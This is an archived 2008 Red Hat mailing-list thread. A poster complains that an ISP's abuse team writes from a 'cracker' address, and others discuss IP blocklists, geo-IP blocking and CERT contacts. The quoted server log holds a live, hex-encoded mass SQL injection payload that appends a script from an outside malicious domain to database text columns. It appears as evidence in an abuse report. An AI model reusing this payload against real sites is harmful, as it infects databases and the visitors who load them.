FAQ Search Today's Posts Mark Forums Read
» Video Reviews

» Linux Archive

Linux-archive is a website aiming to archive linux email lists and to make them easily accessible for linux users/developers.


» Sponsor

» Partners

» Sponsor

Go Back   Linux Archive > Redhat > Red Hat Linux

 
 
LinkBack Thread Tools
 
Old 08-27-2008, 04:04 AM
"Jose R R"
 
Default Infiltration of ISP providers by crackers.

So ...(sigh) what do you do when you complain to a given ISP provider about
a case of attempted abuse by one of their IP addresses and you get a
response from someone in the "security team" whose email name is "cracker?"

Apparently some (or many) of these crackers own (with their consent or not)
even their ISP providers --or worse, some (or many) ISP providers may be
crackers themselves!

A portion of my original complaint to the ISP --where I list one of the
attempted abuse records by the cracker for informational purposes:

----------------------------------------------------------------------------------
from myself <my_emai_address> tonetwork-adm@hinet.net,
network-center@hinet.net
dateMon, Aug 25, 2008 at 11:37 PM subjectAbuse by user at IP address
118.167.20.180 mailed-bymy_domain

On August 25, 2008, from 08:52:10 am to 08:52:28 am (America/Tijuana time),
user at IP address 118.167.20.180 abused <my> web site with the below
referenced offending code (relevant web server log section is attached and
named as abuse-118_167_20_180.txt).

118.167.20.180 - - [25/Aug/2008:08:52:10 -0700] "GET
/blog/index.php/2008/07/12/
xenserver-4-1-and-32-bit-and-64-bit-virt?blog=4';DECLARE%20@S
%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054 207661726368617228323535292C4043207661726368617228 3430303029204445434C415245205461626C655F437572736F 7220435552534F5220464F522073656C65637420612E6E616D 652C622E6E616D652066726F6D207379736F626A6563747320 612C737973636F6C756D6E73206220776865726520612E6964 3D622E696420616E6420612E78747970653D27752720616E64 2028622E78747970653D3939206F7220622E78747970653D33 35206F7220622E78747970653D323331206F7220622E787479 70653D31363729204F50454E205461626C655F437572736F72 204645544348204E4558542046524F4D20205461626C655F43 7572736F7220494E544F2040542C4043205748494C45284040 46455443485F5354415455533D302920424547494E20657865 632827757064617465205B272B40542B275D20736574205B27 2B40432B275D3D2727223E3C2F7469746C653E3C7363726970 74207372633D22687474703A2F2F777777302E646F7568756E 716E2E636E2F63737273732F772E6A73223E3C2F7363726970 743E3C212D2D27272B5B272B40432B275D2077686572652027 2B40432B27206E6F74206C696B6520272725223E3C2F746974 6C653E3C736372697074207372633D22687474703A2F2F7777 77302E646F7568756E716E2E636E2F63737273732F772E6A73 223E3C2F7363726970743E3C212D2D27272729464554434820 4E4558542046524F4D20205461626C655F437572736F722049 4E544F2040542C404320454E4420434C4F5345205461626C65 5F437572736F72204445414C4C4F43415445205461626C655F 437572736F72%20AS%20CHAR(4000));EXEC(@S);
HTTP/1.1" 400 567 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;
Foxy/1; Foxy/1; .NET CLR 1.1.4322)"

[...]

I would appreciate your cooperation in stopping this sort of cracker
engagement.

Thank you in advance for your prompt attention to this issue.

---------------End of portion of email
sent----------------------------------------------------------------------------



Below is an Interesting section of one of the replies:

-------------------------------------------------------------------

Return-Path: <my_email_address>
Received: from localhost (localhost [127.0.0.1])
by dns.adsl.hinet.net (8.12.3/8.12.3/Debian-6.6) with ESMTP id
m7QA4XUN014545
for <cracker@localhost>; Tue, 26 Aug 2008 18:06:31 +0800
[...]

----------End of unformatted
reply----------------------------------------------------------


The above was attached to the formated email reply below:

----------------------------------------------------------------------

from cracker@hinet.net to<my_email_address>
dateTue, Aug 26, 2008 at 4:24 AM subject[HiNetSOC/Craker : 1219749049]HiNet
Notification(HiNet 通知) mailed-bylcss.hinet.net
hide details 4:24 AM (11 hours ago)
Reply


Dear Sir:

Thank you for your email. Please kindly provide us more detail information
about the bad behavior at least including the attackers' IP address, time
(GMT, Greenwich Mean Time) and evidence for further processing.
- Hide quoted text -

Yours sincerely,

HiNet Security Operation Center
Chunghwa Telecom Co., Ltd.
Taipei, Taiwan, R.O.C.
Email: cracker@hinet.net

??考您的原始??信件再附*?案

------End of formatted email
reply-------------------------------------------------------------------

No wonder spam and intrusion attempts never end.

Jose R R
http://www.metztli-it.com

IBM Lotus Symphony <http://symphony.lotus.com> is officially supported on RH
and SuSE; official Ubuntu support coming at the end of August 2008.
--
redhat-list mailing list
unsubscribe mailto:redhat-list-request@redhat.com?subject=unsubscribe
https://www.redhat.com/mailman/listinfo/redhat-list
 
Old 08-27-2008, 11:41 AM
"Burke, Thomas G."
 
Default Infiltration of ISP providers by crackers.

Personally, I just blocked all of apnic... They're the source of over 90% of my issues, and I don't really care if I make them mad.

Of course, youmight not be able to do that if you're running a business...

-----Original Message-----
From: redhat-list-bounces@redhat.com [mailto:redhat-list-bounces@redhat.com] On Behalf Of Jose R R
Sent: Wednesday, August 27, 2008 12:05 AM
To: General Red Hat Linux discussion list
Subject: Infiltration of ISP providers by crackers.

So ...(sigh) what do you do when you complain to a given ISP provider about a case of attempted abuse by one of their IP addresses and you get a response from someone in the "security team" whose email name is "cracker?"

Apparently some (or many) of these crackers own (with their consent or not) even their ISP providers --or worse, some (or many) ISP providers may be crackers themselves!

A portion of my original complaint to the ISP --where I list one of the attempted abuse records by the cracker for informational purposes:

----------------------------------------------------------------------------------
from myself <my_emai_address> tonetwork-adm@hinet.net, network-center@hinet.net dateMon, Aug 25, 2008 at 11:37 PM subjectAbuse by user at IP address 118.167.20.180 mailed-bymy_domain

On August 25, 2008, from 08:52:10 am to 08:52:28 am (America/Tijuana time), user at IP address 118.167.20.180 abused <my> web site with the below referenced offending code (relevant web server log section is attached and named as abuse-118_167_20_180.txt).

118.167.20.180 - - [25/Aug/2008:08:52:10 -0700] "GET /blog/index.php/2008/07/12/ xenserver-4-1-and-32-bit-and-64-bit-virt?blog=4';DECLARE%20@S
%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054 207661726368617228323535292C4043207661726368617228 3430303029204445434C415245205461626C655F437572736F 7220435552534F5220464F522073656C65637420612E6E616D 652C622E6E616D652066726F6D207379736F626A6563747320 612C737973636F6C756D6E73206220776865726520612E6964 3D622E696420616E6420612E78747970653D27752720616E64 2028622E78747970653D3939206F7220622E78747970653D33 35206F7220622E78747970653D323331206F7220622E787479 70653D31363729204F50454E205461626C655F437572736F72 204645544348204E4558542046524F4D20205461626C655F43 7572736F7220494E544F2040542C4043205748494C45284040 46455443485F5354415455533D302920424547494E20657865 632827757064617465205B272B40542B275D20736574205B27 2B40432B275D3D2727223E3C2F7469746C653E3C7363726970 74207372633D22687474703A2F2F777777302E646F7568756E 716E2E636E2F63737273732F772E6A73223E3C2F7363726970 743E3C212D2D27272B5B272B40432B275D2077686572652027 2B40432B27206E6F74206C696B6520272725223E3C2F746974 6C653E3C736372697074207372633D22687474703A2F2F7777 77302E646F7568756E716E2E636E2F63737273732F772E6A73 223E3C2F7363726970743E3C212D2D27272729464554434820 4E4558542046524F4D20205461626C655F437572736F722049 4E544F2040542C404320454E4420434C4F5345205461626C65 5F437572736F72204445414C4C4F43415445205461626C655F 437572736F72%20AS%20CHAR(4000));EXEC(@S);
HTTP/1.1" 400 567 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Foxy/1; Foxy/1; .NET CLR 1.1.4322)"

[...]

I would appreciate your cooperation in stopping this sort of cracker engagement.

Thank you in advance for your prompt attention to this issue.

---------------End of portion of email
sent----------------------------------------------------------------------------



Below is an Interesting section of one of the replies:

-------------------------------------------------------------------

Return-Path: <my_email_address>
Received: from localhost (localhost [127.0.0.1])
by dns.adsl.hinet.net (8.12.3/8.12.3/Debian-6.6) with ESMTP id
m7QA4XUN014545
for <cracker@localhost>; Tue, 26 Aug 2008 18:06:31 +0800 [...]

----------End of unformatted
reply----------------------------------------------------------


The above was attached to the formated email reply below:

----------------------------------------------------------------------

from cracker@hinet.net to<my_email_address> dateTue, Aug 26, 2008 at 4:24 AM subject[HiNetSOC/Craker : 1219749049]HiNet Notification(HiNet 通知) mailed-bylcss.hinet.net hide details 4:24 AM (11 hours ago) Reply


Dear Sir:

Thank you for your email. Please kindly provide us more detail information about the bad behavior at least including the attackers' IP address, time (GMT, Greenwich Mean Time) and evidence for further processing.
- Hide quoted text -

Yours sincerely,

HiNet Security Operation Center
Chunghwa Telecom Co., Ltd.
Taipei, Taiwan, R.O.C.
Email: cracker@hinet.net

請參考您的原始檢舉信件再附*檔案

------End of formatted email
reply-------------------------------------------------------------------

No wonder spam and intrusion attempts never end.

Jose R R
http://www.metztli-it.com

IBM Lotus Symphony <http://symphony.lotus.com> is officially supported on RH and SuSE; official Ubuntu support coming at the end of August 2008.

--
redhat-list mailing list
unsubscribe mailto:redhat-list-request@redhat.com?subject=unsubscribe
https://www.redhat.com/mailman/listinfo/redhat-list
 
Old 08-27-2008, 11:52 AM
George Magklaras
 
Default Infiltration of ISP providers by crackers.

I do not normally bother following up on reports on all attacks. Most of
them are scripted and there are too many. So, my IPS/IDS has a good list
of 'not-to-block' IP addresses and whatever else outside this IP list
attacks any service is blocked. Most good IPS/IDS vendors also provide
near real-time lists of network blocks, especially from countries with
large ISP segments that typically consist of various classes of IP
blocks for home DSL/dialup customers, where most of the compromised PCs
serve botnets and malicious scripters. This keeps the number of IPTABLES
rules down and can block most of these annoying attacks.


GEO-IP blocking may also help if you definitely know that you should not
be expecting traffic from any part of the world. Problem is you need to
update the ip list regularly and be ready to accept some false positives
from IPs that suddenly are legit.


For other types of more persistent and unusual attacks, you need to get
in touch with the CERT team of a major telco provider. They are keen to
know of these issues and if they provide the backbone of your
connectivity, maybe there is part of your SLA that covers these sort of
things, generally speaking.



GM

--
--
George Magklaras

Senior Computer Systems Engineer/UNIX Systems Administrator
EMBnet Technical Management Board
The Biotechnology Centre of Oslo,
University of Oslo
http://folk.uio.no/georgios



Jose R R wrote:

So ...(sigh) what do you do when you complain to a given ISP provider about
a case of attempted abuse by one of their IP addresses and you get a
response from someone in the "security team" whose email name is "cracker?"

Apparently some (or many) of these crackers own (with their consent or not)
even their ISP providers --or worse, some (or many) ISP providers may be
crackers themselves!

A portion of my original complaint to the ISP --where I list one of the
attempted abuse records by the cracker for informational purposes:

----------------------------------------------------------------------------------
from myself <my_emai_address> tonetwork-adm@hinet.net,
network-center@hinet.net
dateMon, Aug 25, 2008 at 11:37 PM subjectAbuse by user at IP address
118.167.20.180 mailed-bymy_domain

On August 25, 2008, from 08:52:10 am to 08:52:28 am (America/Tijuana time),
user at IP address 118.167.20.180 abused <my> web site with the below
referenced offending code (relevant web server log section is attached and
named as abuse-118_167_20_180.txt).

118.167.20.180 - - [25/Aug/2008:08:52:10 -0700] "GET
/blog/index.php/2008/07/12/
xenserver-4-1-and-32-bit-and-64-bit-virt?blog=4';DECLARE%20@S
%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054 207661726368617228323535292C4043207661726368617228 3430303029204445434C415245205461626C655F437572736F 7220435552534F5220464F522073656C65637420612E6E616D 652C622E6E616D652066726F6D207379736F626A6563747320 612C737973636F6C756D6E73206220776865726520612E6964 3D622E696420616E6420612E78747970653D27752720616E64 2028622E78747970653D3939206F7220622E78747970653D33 35206F7220622E78747970653D323331206F7220622E787479 70653D31363729204F50454E205461626C655F437572736F72 204645544348204E4558542046524F4D20205461626C655F43 7572736F7220494E544F2040542C4043205748494C45284040 46455443485F5354415455533D302920424547494E20657865 632827757064617465205B272B40542B275D20736574205B27 2B40432B275D3D2727223E3C2F7469746C653E3C7363726970 74207372633D22687474703A2F2F777777302E646F7568756E 716E2E636E2F63737273732F772E6A73223E3C2F7363726970 743E3C212D2D27272B5B272B40432B275D2077686572652027 2B40432B27206E6F74206C696B6520272725223E3C2F746974 6C653E3C736372697074207372633D22687474

703A2F2F777777302E646F7568756E716E2E636E2F63737273 732F772E6A73223E3C2F7363726970743E3C212D2D27272729 4645544348204E4558542046524F4D20205461626C655F4375 72736F7220494E544F2040542C404320454E4420434C4F5345 205461626C655F437572736F72204445414C4C4F4341544520 5461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@ S);

HTTP/1.1" 400 567 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;
Foxy/1; Foxy/1; .NET CLR 1.1.4322)"

[...]

I would appreciate your cooperation in stopping this sort of cracker
engagement.

Thank you in advance for your prompt attention to this issue.

---------------End of portion of email
sent----------------------------------------------------------------------------



Below is an Interesting section of one of the replies:

-------------------------------------------------------------------

Return-Path: <my_email_address>
Received: from localhost (localhost [127.0.0.1])
by dns.adsl.hinet.net (8.12.3/8.12.3/Debian-6.6) with ESMTP id
m7QA4XUN014545
for <cracker@localhost>; Tue, 26 Aug 2008 18:06:31 +0800
[...]

----------End of unformatted
reply----------------------------------------------------------


The above was attached to the formated email reply below:

----------------------------------------------------------------------

from cracker@hinet.net to<my_email_address>
dateTue, Aug 26, 2008 at 4:24 AM subject[HiNetSOC/Craker : 1219749049]HiNet
Notification(HiNet 通知) mailed-bylcss.hinet.net
hide details 4:24 AM (11 hours ago)
Reply


Dear Sir:

Thank you for your email. Please kindly provide us more detail information
about the bad behavior at least including the attackers' IP address, time
(GMT, Greenwich Mean Time) and evidence for further processing.
- Hide quoted text -

Yours sincerely,

HiNet Security Operation Center
Chunghwa Telecom Co., Ltd.
Taipei, Taiwan, R.O.C.
Email: cracker@hinet.net

請參考您的原始檢舉信件再附*檔案

------End of formatted email
reply-------------------------------------------------------------------

No wonder spam and intrusion attempts never end.

Jose R R
http://www.metztli-it.com

IBM Lotus Symphony <http://symphony.lotus.com> is officially supported on RH
and SuSE; official Ubuntu support coming at the end of August 2008.



--
redhat-list mailing list
unsubscribe mailto:redhat-list-request@redhat.com?subject=unsubscribe
https://www.redhat.com/mailman/listinfo/redhat-list
 
Old 08-28-2008, 03:05 AM
"Jose R R"
 
Default Infiltration of ISP providers by crackers.

>
> On Wed, Aug 27, 2008 at 4:41 AM, Burke, Thomas G. <tg.burke@ngc.com>wrote:
>> Personally, I just blocked all of apnic... They're the source of over 90%
>> of my issues, and I don't really care if I make them mad.
>>
>
On Wed, Aug 27, 2008 at 4:52 AM, George Magklaras <georgios@biotek.uio.no>wrote:

> I do not normally bother following up on reports on all attacks. Most of
> them are scripted and there are too many. So, my IPS/IDS has a good list of
> 'not-to-block' IP addresses and whatever else outside this IP list attacks
> any service is blocked. Most good IPS/IDS vendors also provide near
> real-time lists of network blocks, especially from countries with large ISP
> segments that typically consist of various classes of IP blocks for home
> DSL/dialup customers, where most of the compromised PCs serve botnets and
> malicious scripters. This keeps the number of IPTABLES rules down and can
> block most of these annoying attacks.
>
> GEO-IP blocking may also help if you definitely know that you should not be
> expecting traffic from any part of the world. Problem is you need to update
> the ip list regularly and be ready to accept some false positives from IPs
> that suddenly are legit.
>
> For other types of more persistent and unusual attacks, you need to get in
> touch with the CERT team of a major telco provider. They are keen to know of
> these issues and if they provide the backbone of your connectivity, maybe
> there is part of your SLA that covers these sort of things, generally
> speaking.
>

Your insights and suggestions are appreciated, thank you.

Jose R R
http://www.metztli-it.com
--
redhat-list mailing list
unsubscribe mailto:redhat-list-request@redhat.com?subject=unsubscribe
https://www.redhat.com/mailman/listinfo/redhat-list
 

Thread Tools




All times are GMT. The time now is 07:29 AM.

VBulletin, Copyright ©2000 - 2014, Jelsoft Enterprises Ltd.
Content Relevant URLs by vBSEO ©2007, Crawlability, Inc.
Copyright 2007 - 2008, www.linux-archive.org